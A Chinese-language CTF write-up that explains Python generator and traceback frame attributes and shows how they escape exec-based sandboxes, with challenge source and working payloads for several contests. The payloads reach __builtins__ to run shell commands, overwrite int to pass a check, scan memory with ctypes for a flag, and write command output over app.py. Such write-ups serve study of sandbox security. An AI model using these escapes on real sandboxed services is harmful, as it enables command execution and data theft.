Python栈帧沙箱逃逸

上接Mini L-CTF2025复现

Python利用栈帧沙箱逃逸-先知社区

python栈帧沙箱逃逸 - Zer0peach can’t think

生成器

概念

生成器(Generator)是 Python 中一种特殊的迭代器,它可以通过简单的函数和表达式来创建。生成器的主要特点是能够逐个产生值,并且在每次生成值后保留当前的状态,以便下次调用时可以继续生成值。这使得生成器非常适合处理大型数据集或需要延迟计算的情况。

在 Python 中,生成器可以使用 yield 关键字来定义。yield 用于产生一个值,并在保留当前状态的同时暂停函数的执行。当下一次调用生成器时,函数会从上次暂停的位置继续执行,直到遇到下一个 yield 语句或者函数结束。

例子

1
2
3
4
5
6
7
8
9
def generator():
a = 1
while True:
yield a
a += 1
g = generator()
print(next(g))
print(next(g))
print(next(g))

运行如下:

当然也可以换其他方式:

1
2
3
4
5
6
7
8
def generator():
a = 1
for i in range(1,100):
yield a
a += 1
g = generator()
for value in g:
print(value)

运行如下:

生成器的属性

gi_code: 生成器对应的code对象。
gi_frame: 生成器对应的frame(栈帧)对象。
gi_running: 生成器函数是否在执行。生成器函数在yield以后、执行yield的下一行代码前处于frozen状态,此时这个属性的值为0。
gi_yieldfrom:如果生成器正在从另一个生成器中 yield 值,则为该生成器对象的引用;否则为 None。
gi_frame.f_locals:一个字典,包含生成器当前帧的本地变量。

gi_frame 是一个与生成器(generator)和协程(coroutine)相关的属性。它指向生成器或协程当前执行的帧对象(frame object),如果这个生成器或协程正在执行的话。帧对象表示代码执行的当前上下文,包含了局部变量、执行的字节码指令等信息

当然还有f_系列的:

f_locals: 一个字典,包含了函数或方法的局部变量。键是变量名,值是变量的值。
f_globals: 一个字典,包含了函数或方法所在模块的全局变量。键是全局变量名,值是变量的值。
f_code: 一个代码对象(code object),包含了函数或方法的字节码指令、常量、变量名等信息。
f_lasti: 整数,表示最后执行的字节码指令的索引。
f_back: 指向上一级调用栈帧的引用,用于构建调用栈。

利用栈帧沙箱逃逸

next获取

原理就是生成器的栈帧对象通过f_back(返回前一帧)从而逃逸出去获取globals全局符号表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
s3cret="this is flag"

codes='''
def waff():
def f():
yield g.gi_frame.f_back

g = f() #生成器

frame = next(g) #获取到生成器的栈帧对象
# frame = [x for x in g][0] #由于生成器也是迭代器,所以也可以获取到生成器的栈帧对象

b = frame.f_back.f_back.f_globals['s3cret'] #返回并获取前一级栈帧的globals
return b
b=waff()
'''
locals={}
code = compile(codes, "test", "exec")
exec(code,locals)
print(locals["b"])
  1. 使用next获取到的就是yield定义的值,这里获取到的就是g.gi_frame.f_back
  2. 使用g.gi_frame.f_back的话,那么g = f()就必须为g,用的就是这个生成器对象的栈帧
  3. compile(codes, "test", "exec")就是设置了名称为test的python沙箱环境,exec表示codes是可以执行的代码

看看逃逸的路程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
s3cret="this is flag"

codes='''
def waff():
def f():
yield g.gi_frame.f_back

g = f() #生成器

frame = next(g) #获取到生成器的栈帧对象
print(frame)
print(frame.f_back)
print(frame.f_back.f_back)


waff()
'''
locals={}
code = compile(codes, "test", "exec")
exec(code,locals)

运行如下:

可以发现顺序是

f -> waff -> <module>(test) -> zhan.py

循环逃逸

在不能用next()进行获取栈帧的情况下,可以用for循环获取:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
secret = "0xGame{Y0u_@r3_@_Exc3ll3n7_C7f3r}"

code1 = '''
def waff2():
def f():
yield g.gi_frame.f_back

g = f() # 创建生成器对象

# 使用生成器表达式获取栈帧对象
a = (g.gi_frame.f_back for _ in [1])
a = [x for x in a][0]

# 访问全局变量
globals_dict = a.f_back.f_globals
return globals_dict['secret']

b = waff2()
'''

locals1 = {}
compiled_code = compile(code1, "text", "exec")

# 创建一个新的作用域来执行编译后的代码
exec_locals = {}
exec(compiled_code, exec_locals)

# 打印结果
print(exec_locals["b"])

获取global后,就可以执行例如:

1
2
3
print(a.f_back.f_globals['__builtins__'].__import__('os').popen('ls /').read())

print(a.f_back.f_globals['flag'])

例题

2024L3HCTF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import sys
import os

codes='''
<<codehere>>
'''

try:
codes.encode("ascii")
except UnicodeEncodeError:
exit(0)

if "__" in codes:
print("__ bypass!!")
exit(0)

codes+="\nres=factorization(c)"
print(codes)
locals={"c":"696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863","__builtins__": None}
res=set()

def blackFunc(oldexit):
def func(event, args):
blackList = ["process","os","sys","interpreter","cpython","open","compile","__new__","gc"]
for i in blackList:
if i in (event + "".join(str(s) for s in args)).lower():
print("noooooooooo")
print(i)
oldexit(0)
return func

code = compile(codes, "<judgecode>", "exec")
sys.addaudithook(blackFunc(os._exit))
exec(code,{"__builtins__": None},locals)
print(locals)

p=int(locals["res"][0])
q=int(locals["res"][1])
if(p>1e5 and q>1e5 and p*q==int("696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863")):
print("Correct!",end="")
else:
print("Wrong!",end="")

从头开始看:

1
2
3
if "__" in codes:
print("__ bypass!!")
exit(0)

这里禁用了双下划线,不过可以用 '_'*2 来绕过

然后这边禁用了__builtins__,就不可以用next

1
"__builtins__": None

接着黑名单,禁用了gc方法:

1
2
3
4
5
6
7
8
9
def blackFunc(oldexit):
def func(event, args):
blackList = ["process","os","sys","interpreter","cpython","open","compile","__new__","gc"]
for i in blackList:
if i in (event + "".join(str(s) for s in args)).lower():
print("noooooooooo")
print(i)
oldexit(0)
return func

然后给了个条件判断:

1
2
3
4
if(p>1e5 and q>1e5 and p*q==int("69...441667638597863")):
print("Correct!",end="")
else:
print("Wrong!",end="")

要求p和q都得大于100000,其次就是p和q的积为int(“69…97863”)

这一看就是不太可能正常来打这个条件,然后这边直接获取栈帧然后逃逸到外部使用globals来修改这个int函数来绕过if

Payload:

1
2
3
4
5
6
def new_int():
return 10001*10002
a = (a.gi_frame._f_back.f_back for i in [1])
a = [x for x in a][0]
builtins = a.f_back._f_globals['_'*2+'builtins'+'_'*2]
builtins.int = new_int

或者是:

1
2
3
4
5
6
7
8
def factorization(n):
def my_generator():
yield gen.gi_frame.f_back.f_back.f_back
gen = my_generator()
for item in gen:
frame = item #获取栈帧
frame.f_globals["_"+"_builtins_"+"_"].setattr(frame.f_globals["_"+"_builtins_"+"_"],'int',lambda x:123456 if x==123456 else 15241383936)
return (123456,123456)#满足都大于1e5条件

动态修改 int
使用 setattr__builtins__ 中的 int 类型替换为一个自定义的 lambda 函数:

1
lambda x: 123456 if x == 123456 else 15241383936
  • 当输入为 123456 时,返回 123456
  • 其他情况下返回 15241383936(这个值是 123456^2)。

第九届中国海洋大学信息安全竞赛 菜狗工具#2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from flask import *
import io
import time

app = Flask(__name__)
black_list = [
'__build_class__', '__debug__', '__doc__', '__import__',
'__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input'
]
new_builtins = dict([
(key, val) for key, val in __builtins__.__dict__.items() if key not in black_list
])

flag = "flag{xxxxxx}"
flag = "DISPOSED"

@app.route("/")
def index():
return redirect("/static/index.html")

@app.post("/run")
def run():
out = io.StringIO()
script = str(request.form["script"])

def wrap_print(*args, **kwargs):
kwargs["file"] = out
print(*args, **kwargs)
new_builtins["print"] = wrap_print

try:
exec(script, {"__builtins__": new_builtins})
except Exception as e:
wrap_print(e)

ret = out.getvalue()
out.close()
return ret

time.sleep(5) # current source file is deleted
app.run('0.0.0.0', port=9001)

要获得被覆写的 flag就是依靠 python 解析自身进程的内存

而每个栈帧都会保存当时的 py 字节码和记录自身上一层的栈帧

Payload1

利用 ctypes模块的指针,将flag地址周围的值读一下,实现一个从内存读源码

因为真正的flag在覆盖的flag之前,所以读到假的flag的地址后,往前读取即可

这里用了char 指针,读出来的是一个字符串

最细节的是每次位移8的倍数。(可以自行对比任意两个变量的地址,可以发现它们的差值都是8的倍数)

1
2
3
4
5
6
7
8
9
10
11
12
a=(a.gi_frame.f_back.f_back for i in [1])
a = [x for x in a][0]

b = a.f_back.f_globals
flag_id = id(b['flag']) #id()函数用于读取内存地址
ctypes = b["__builtins__"].__import__('ctypes')
#print(ctypes)

for i in range(10000):
txt = ctypes.cast((flag_id-8*i),ctypes.c_char_p).value
if b"flag" in txt:
print(txt)
Payload2

官方wp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sys = print.__globals__["__builtins__"].__import__('sys')
io = print.__globals__["__builtins__"].__import__('io')
dis = print.__globals__["__builtins__"].__import__('dis')
threading = print.__globals__["__builtins__"].__import__('threading')
print(threading.enumerate()) #获取所有活跃线程
print(threading.main_thread()) #获取主线程
print(threading.main_thread().ident) # 获取主线程标识符
print(sys._current_frames()) # 获取所有线程的堆栈帧对象
print(sys._current_frames()[threading.main_thread().ident]) #获取到主线程的堆栈帧对象


frame = sys._current_frames()[threading.main_thread().ident]

while frame is not None:
out = io.StringIO() # 内存创建字符串I/O流
dis.dis(frame.f_code,file=out) # 将当前堆栈帧所对应的函数的字节码进行反汇编
content = out.getvalue() #获取反汇编的结果
out.close()
print(content)
frame = frame.f_back
Payload3
1
2
3
print([].__class__.__base__.__subclasses__()[84].load_module('gc').get_objects())

#<class '_frozen_importlib.BuiltinImporter'>

异常栈帧逃逸

miniLCTF_2025/OfficialWriteups/Web/GuessOneGuess-PyBox.md at main · XDSEC/miniLCTF_2025

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
from flask import Flask, request, Response
import multiprocessing
import sys
import io
import ast

app = Flask(__name__)

class SandboxVisitor(ast.NodeVisitor):
forbidden_attrs = {
"__class__", "__dict__", "__bases__", "__mro__", "__subclasses__",
"__globals__", "__code__", "__closure__", "__func__", "__self__",
"__module__", "__import__", "__builtins__", "__base__"
}
def visit_Attribute(self, node):
if isinstance(node.attr, str) and node.attr in self.forbidden_attrs:
raise ValueError
self.generic_visit(node)
def visit_GeneratorExp(self, node):
raise ValueError
def sandbox_executor(code, result_queue):
safe_builtins = {
"print": print,
"filter": filter,
"list": list,
"len": len,
"addaudithook": sys.addaudithook,
"Exception": Exception
}
safe_globals = {"__builtins__": safe_builtins}

sys.stdout = io.StringIO()
sys.stderr = io.StringIO()

try:
exec(code, safe_globals)
output = sys.stdout.getvalue()
error = sys.stderr.getvalue()
result_queue.put(("ok", output or error))
except Exception as e:
result_queue.put(("err", str(e)))

def safe_exec(code: str, timeout=1):
code = code.encode().decode('unicode_escape')
tree = ast.parse(code)
SandboxVisitor().visit(tree)
result_queue = multiprocessing.Queue()
p = multiprocessing.Process(target=sandbox_executor, args=(code, result_queue))
p.start()
p.join(timeout=timeout)

if p.is_alive():
p.terminate()
return "Timeout: code took too long to run."

try:
status, output = result_queue.get_nowait()
return output if status == "ok" else f"Error: {output}"
except:
return "Error: no output from sandbox."

CODE = """
def my_audit_checker(event,args):
allowed_events = ["import", "time.sleep", "builtins.input", "builtins.input/result"]
if not list(filter(lambda x: event == x, allowed_events)):
raise Exception
if len(args) > 0:
raise Exception

addaudithook(my_audit_checker)
print("{}")

"""
badchars = "\"'|&`+-*/()[]{}_."

@app.route('/')
def index():
return open(__file__, 'r').read()

@app.route('/execute',methods=['POST'])
def execute():
text = request.form['text']
for char in badchars:
if char in text:
return Response("Error", status=400)
output=safe_exec(CODE.format(text))
if len(output)>5:
return Response("Error", status=400)
return Response(output, status=200)


if __name__ == '__main__':
app.run(host='0.0.0.0')

这个在没禁用Exception的时候可以用

通过try和except的方法抛出异常,然后运用__traceback__追踪异常并定位到发生异常的栈帧,然后再回溯到上一层:

1
2
3
4
5
6
try:
1/0
except Exception as e:
frame = e.__traceback__.tb_frame.f_back
builtins = frame.f_globals['__builtins__']
builtins.exec("builtins.__import__('os').system('ls / -al > app.py')")
  1. 通过 1/0 主动引发一个异常,目的是进入 except 块并获取异常对象
  2. 捕获异常后,e 包含完整的堆栈信息(__traceback__ 属性)

__traceback__ 属性

  • 定义:当一个异常被抛出时,异常对象会有一个 __traceback__ 属性,它指向一个 traceback 对象。这个对象包含了异常发生时的调用栈信息,包括文件名、行号、函数名等
  • 用途:用于调试和记录异常信息,帮助开发者了解异常发生的上下文
  • 访问方式:可以通过异常对象的 __traceback__ 属性访问

tb_frame 属性

  • 定义traceback 对象有一个 tb_frame 属性,它指向发生异常时的栈帧对象。栈帧对象包含了该调用栈层的局部变量、全局变量等信息
  • 用途:用于深入调试,可以访问发生异常时的变量状态
  • 访问方式:通过 traceback 对象的 tb_frame 属性访问